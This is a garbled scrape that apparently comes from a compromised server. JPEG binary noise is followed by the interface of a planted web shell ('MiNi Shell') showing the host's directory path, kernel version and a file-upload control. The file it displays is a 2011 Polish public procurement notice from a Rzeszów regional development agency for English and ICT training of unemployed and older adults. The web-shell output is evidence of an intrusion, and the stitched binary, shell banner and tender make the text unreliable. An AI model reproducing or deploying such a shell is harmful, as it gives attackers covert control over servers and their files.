JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110415/80224-N-2011.html

<p class="kh_header"><b>Rzeszów: Przeprowadzenie usługi szkoleniowej z języka angielskiego oraz z zakresu technologii informacyjnych i komunikacyjnych dla 75 Beneficjentów dwóch projektów, w tym dla:
a) 30 Beneficjentów Projektu DAJMY SZANSĘ DOJRZAŁOŚCI, o numerze identyfikacyjnym KSI: WND-POKL.07.02.01-18-249/09
b) 45 Beneficjentów Projektu FOCUS -Twoje miejsce w życiu, Twoje miejsce na rynku pracy, o numerze identyfikacyjnym KSI: WND-POKL.07.02.01-18-248/09</b><br>
<b>Numer ogłoszenia: 80224 - 2011; data zamieszczenia: 15.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rzeszowska Agencja Rozwoju Regionalnego S.A. , ul. Szopena 51, 35-959 Rzeszów, woj. podkarpackie, tel. 017 8520600, 8520610, faks 017 8520611.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rarr.rzeszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie usługi szkoleniowej z języka angielskiego oraz z zakresu technologii informacyjnych i komunikacyjnych dla 75 Beneficjentów dwóch projektów, w tym dla:
a) 30 Beneficjentów Projektu DAJMY SZANSĘ DOJRZAŁOŚCI, o numerze identyfikacyjnym KSI: WND-POKL.07.02.01-18-249/09
b) 45 Beneficjentów Projektu FOCUS -Twoje miejsce w życiu, Twoje miejsce na rynku pracy, o numerze identyfikacyjnym KSI: WND-POKL.07.02.01-18-248/09.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie usługi szkoleniowej z języka angielskiego oraz z zakresu technologii informacyjnych i komunikacyjnych dla 75 Beneficjentów dwóch projektów, w tym dla:
- 30 Beneficjentów Projektu DAJMY SZANSĘ DOJRZAŁOŚCI o numerze identyfikacyjnym KSI: WND-POKL.07.02.01-18-249/09 współfinansowanego z Europejskiego Funduszu Społecznego realizowanego w ramach Poddziałania 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym, Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Priorytet VII Promocja integracji społecznej;
- 45 Beneficjentów Projektu FOCUS -Twoje miejsce w życiu, Twoje miejsce na rynku pracy o numerze identyfikacyjnym KSI: WND-POKL.07.02.01-18-248/09 współfinansowanego z Europejskiego Funduszu Społecznego realizowanego w ramach Poddziałania 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym, Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Priorytet VII Promocja integracji społecznej.
Przedmiot zamówienia został podzielony na 2 części tj. 
Część nr 1 - Szkolenie z języka angielskiego 
Część nr 2 - Szkolenie z zakresu technologii informacyjnych i komunikacyjnych
Oferty można składać na dowolną ilość części. 
Szczegółowy opis przedmiotu zamówienia zawierają:
Załącznik nr 1 dla części nr 1 opis i zakres przedmiotu zamówienia szkolenie z języka angielskiego, 
Załącznik nr 2 dla części nr 2 opis i zakres przedmiotu zamówienia szkolenie z Zakresu technologii informacyjnych i komunikacyjnych 
Załącznik nr 3A	harmonogram  
Załącznik nr 3B	harmonogram 
Załącznik nr 4	umowa dla części nr 1
Załącznik nr 5	umowa dla części nr 2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających. 
Zamówienia uzupełniające mogą być realizowane na podstawie art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tj. Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.) w sytuacji gdy: 
- w okresie 3 lat od daty udzielenia zamówienia podstawowego, 
- stanowiących nie więcej niż 50% wartości zamówienia podstawowego, 
- polegających na powtórzeniu tego samego rodzaju zamówień tj. szkolenie z języka angielskiego i/lub szkolenie z zakresu technologii informacyjnych i komunikacyjnych, 
- w sytuacji gdy w czasie realizacji dwóch projektów tj. DAJMY SZANSĘ DOJRZAŁOŚCI i FOCUS -Twoje miejsce w życiu, Twoje miejsce na rynku pracy powstanie potrzeba przeszkolenia kolejnych osób i znajda się środki finansowe, 
- zamówienia uzupełniające zostaną zlecone dotychczasowemu wykonawcy tj. wykonawcy zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.58.00.00-3, 80.50.00.00-9, 80.53.31.00-0, 80.53.32.00-1, 80.53.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował zamówienie/a tożsame z przedmiotem zamówienia tj.
Dla części nr 1 
Zrealizował (rozpoczął i zakończył) przeszkolenie z języka angielskiego co najmniej 50 dorosłych osób, przeszkolenie 50 dorosłych osób może się odbyć łącznie w maksymalnie 5 szkoleniach. 
Dla części nr 2 
Zrealizował (rozpoczął i zakończył) przeszkolenie z zakresu technologii informacyjnych i komunikacyjnych co najmniej 50 dorosłych osób, przeszkolenie 50 dorosłych osób może się odbyć łącznie w maksymalnie 5 szkoleniach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że dysponuje następującymi osobami: 
Dla części nr 1 
Co najmniej 3 osoby posiadające 
-	wykształcenie: magister lub licencjat filologii angielskiej, magister lingwistyki stosowanej/język angielski, 
-	doświadczenie w prowadzeniu szkoleń z języka angielskiego (minimum 2 lata i/lub co najmniej 5 przeprowadzonych szkoleń /kursów, 
-	doświadczenie w pracy z osobami dorosłymi. 
Dla części nr 2 
Co najmniej 2 osoby posiadające 
-	wykształcenie: wyższe kierunkowe (informatyczne) minimum licencjat;  
- doświadczenie w prowadzeniu szkoleń komputerowych (minimum 2 lata i/lub co najmniej 5 przeprowadzonych szkoleń, 
- doświadczenie w pracy z osobami dorosłymi.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełneniu warunków określonych w art. 22 ust. 1 Pzp, pełnomocnictwo - jeżeli dotyczy, zakres dla podwykonawców - jeżeli dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy. Warunki dokonania zmian umowy:
1) Zamawiający przewiduje możliwość zmiany umowy w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie projektu, 
2) Zamawiający przewiduje możliwość zmiany liczby osób uczestniczących w szkoleniach. Maksymalna liczba osób uczestniczących w szkoleniach 75. Zmiana liczby osób może nastąpić tylko w sytuacji gdy w wyniku naboru uczestników projektów (beneficjentów ostatecznych) i ich zgody na udział w szkoleniach liczba osób uczestniczących w szkoleniach będzie mniejsza niż 75. W takim przypadku wykonawca otrzyma wynagrodzenie za liczbę osób zgłoszonych do szkolenia według listy dostarczonej przez zamawiającego.  
3) Zamawiający przewiduje możliwość zmiany szczegółowych terminów (dat) prowadzenia szkolenia jednak nie więcej niż o 5 dni roboczych. 
4) Zmiany umowy mogą się odbyć pod rygorem nieważności w formie pisemnej za zgodą stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rarr.rzeszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rzeszowska Agencja Rozwoju Regionalnego S.A. w Rzeszowie
35-959 Rzeszów, ul. Szopena 51, pok. 314..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2011 godzina 09:00, miejsce: Rzeszowska Agencja Rozwoju Regionalnego S.A. w Rzeszowie
35-959 Rzeszów, ul. Szopena 51, pok. nr 317 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Źródło finansowania: 
Projekty: 
a) DAJMY SZANSĘ DOJRZAŁOŚCI o numerze identyfikacyjnym KSI: WND-POKL.07.02.01-18-249/09, współfinansowanego z Europejskiego Funduszu Społecznego realizowanego w ramach Poddziałania 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym, Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Priorytet VII Promocja integracji społecznej.
b) FOCUS - Twoje miejsce w życiu, Twoje miejsce na rynku pracy o numerze identyfikacyjnym KSI: WND-POKL.07.02.01-18-248/09, współfinansowanego z Europejskiego Funduszu Społecznego realizowanego w ramach Poddziałania 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym, Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Priorytet VII Promocja integracji społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenie z języka angielskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie usługi szkoleniowej z języka angielskiego dla 75 Beneficjentów dwóch projektów, w tym dla:
- 30 Beneficjentów Projektu DAJMY SZANSĘ DOJRZAŁOŚCI, o numerze identyfikacyjnym KSI: WND-POKL.07.02.01-18-249/09 współfinansowanego z Europejskiego Funduszu Społecznego realizowanego w ramach Poddziałania 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym, Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Priorytet VII Promocja integracji społecznej;
- 45 Beneficjentów Projektu FOCUS -Twoje miejsce w życiu, Twoje miejsce na rynku pracy, o numerze identyfikacyjnym KSI: WND-POKL.07.02.01-18-248/09 współfinansowanego z Europejskiego Funduszu Społecznego realizowanego w ramach Poddziałania 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym, Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Priorytet VII Promocja integracji społecznej.
Uczestnikami projektu będą:
- osoby po 45 roku życia: 30 osób
- osoby długotrwale bezrobotne: 45 osób

Liczba uczestników szkolenia z języka angielskiego: 75 osób

Liczba grup: 5 grup 15 osobowych, w tym:
- 2 grupy x 15 osób = 30 osób w ramach Projektu DAJMY SZANSĘ DOJRZAŁOŚCI
- 3 grupy x 15 osób = 45 osób w ramach Projektu FOCUS -Twoje miejsce w życiu, Twoje miejsce na rynku pracy
Liczba godzin przypadająca na jedną grupę: 96 godzin lekcyjnych (1 godzina = 45 minut), 3h dziennie x 32 dni (3-4 razy w tygodniu, w dni powszednie od poniedziałku do piątku) - zgodnie z harmonogramem przedstawionym przez Zamawiającego (Załącznik nr 3A - Harmonogram Projektu DAJMY SZANSĘ DOJRZAŁOŚCI, Załącznik nr 3B - Harmonogram Projektu FOCUS -Twoje miejsce w życiu, Twoje miejsce na rynku pracy).
Łączna liczba godzin szkolenia z języka angielskiego: 480 godzin lekcyjnych (45 minutowych).
II. Czas realizacji zamówienia:
Przewidywany termin realizacji zamówienia: od 05 maja 2011 roku do 30 czerwca 2011 roku (5 grup szkoleniowych tj. 75 BO w tym 3 grupy osób długotrwale bezrobotnych i 2 grupy osób po 45 roku życia).

III. Szczegółowa tematyka szkolenia z zakresu języka angielskiego.
Tematyka szkolenia z języka angielskiego powinna być dopasowana do stopnia zaawansowania uczestników tworzących daną grupę szkoleniową (możliwe poziomy umiejętności uczestnika szkolenia to: podstawowy, średniozaawansowany i zaawansowany). Zajęcia muszą uwzględniać naukę czytania, pisania, rozumienia ze słuchu, mówienia oraz naukę gramatyki.
Sposób i zakres prowadzenia zajęć powinien umożliwić uczestnikom szkolenia przystąpienie do egzaminu certyfikującego, odpowiedniego do poziomu zaawansowania każdego uczestnika objętego szkoleniem z języka angielskiego. Egzamin certyfikujący będzie sfinansowany przez Zamawiającego na koniec niniejszego szkolenia. Zamawiający nie wyznacza żadnego progu zdawalności dla uczestników, którzy przystąpią do egzaminu certyfikującego.

IV. Wykonawca zobowiązuje się do:
1. Zapewnienia sal edukacyjnych z oświetleniem dziennym i sztucznym oraz z zapleczem sanitarnym na cele przeprowadzenia szkolenia z języka angielskiego dla 5 grup 15 osobowych.
2. Przeprowadzenia usługi zgodnie z przedmiotem zamówienia i harmonogramem dołączonym do przedmiotu zamówienia. (Załącznik nr 3A - Harmonogram Projektu DAJMY SZANSĘ DOJRZAŁOŚCI, Załącznik nr 3B - Harmonogram Projektu FOCUS -Twoje miejsce w życiu, Twoje miejsce na rynku pracy).
3. Prowadzenia ciągłego nadzoru i kontroli merytorycznej nad realizacją usługi, w celu zapewnienia wysokiego poziomu prowadzonego szkolenia z języka angielskiego.
4. Przeprowadzania testów, ćwiczeń mierzących postęp w nauce Beneficjentów (wynik testu procentowy), w tym: testu na początku szkolenia, w trakcie i na zakończenie szkolenia z j. angielskiego oraz przygotowania na koniec szkolenia z j. angielskiego omówienia wszystkich testów i postępów w nauce dla każdego Beneficjenta odrębnie.
5. Skonsultowania z Zamawiającym rodzaju podręczników i ćwiczeń w celu dostosowania ich do poziomu umiejętności uczestników projektów. (Informacja o proponowanym podręczniku i ćwiczeniach dla każdej grupy powinna zostać zgłoszona Zamawiającemu przez trenerów po przeprowadzeniu przez nich pierwszych zajęć z każdą grupą szkoleniową).
6. Bieżącego informowania Zamawiającego o pojawiających się problemach w realizacji usługi, w tym o przypadkach nieobecności uczestników na zajęciach oraz wypadkach rezygnacji z uczestnictwa w trakcie realizacji usługi, pod rygorem odmowy zapłaty za całe szkolenie dla tych osób.
7. Prowadzenia szkolenia z wykorzystaniem sprzętu multimedialnego,
8. Stosowania wzorów list obecności, list odbioru materiałów oraz list odbioru zaświadczeń/certyfikatów  przekazanych przez Zamawiającego. Otrzymane wzory Wykonawca zobowiązuje się samodzielnie drukować i wykorzystywać w trakcie realizacji całego przedmiotu zamówienia zgodnie z ich przeznaczeniem.
9. Prowadzenia dokumentacji szkolenia odrębnie dla każdej grupy szkoleniowej oraz jej oznakowania zgodnie z wytycznymi Zamawiającego odrębnie dla każdego projektu w tym:
- list obecności na każdy dzień szkolenia z języka angielskiego, podpisanych odręcznie przez uczestników i przeprowadzającego szkolenie;
- dziennika zajęć zawierającego: wymiar godzin, program i tematy szkolenia, podpisy osób prowadzących daną grupę szkoleniową, wykaz obecności uczestników szkolenia, oceny i informację dotyczące postępów w nauce każdego uczestnika oraz dodatkowe informacje, w tym wizyty kontrolne.
10. Umożliwiania Zamawiającemu przeprowadzenia wszelkich ankiet ewaluacyjnych 
i oceniających oraz umożliwienie prowadzenia kontroli przebiegu realizacji szkolenia z języka angielskiego.
11. Zapewnienia wykwalifikowanych i doświadczonych trenerów/prowadzących dla każdej z 5 grup szkoleniowych z języka angielskiego, odpowiednio do poziomu zaawansowania każdej grupy.
12. Zmiany wskazanego przez Zamawiającego trenera/prowadzącego szkolenie z języka angielskiego w przypadku zaistnienia okoliczności wskazujących na niewywiązywanie się przez niego w należyty sposób z powierzonych mu zadań.
13. Wydania uczestnikom szkolenia zaświadczenia/certyfikatu o jego ukończeniu, zgodnie 
z obowiązującymi w tym zakresie przepisami, poświadczającego ich uczestnictwo 
w działaniach realizowanych w ramach projektu. Zaświadczenia powinny zawierać oznaczenia wymagane przez RARR S.A. Ostateczna treść i wygląd zaświadczeń muszą zostać zatwierdzone przez Zamawiającego.
14. Przekazania Zamawiającemu każdorazowo w terminie 3 dni kalendarzowych po zakończeniu zajęć w danym miesiącu przez każdą grupę szkoleniową kompletu dokumentacji dla danej grupy obejmującej oryginały list obecności, za każdy dzień szkolenia,
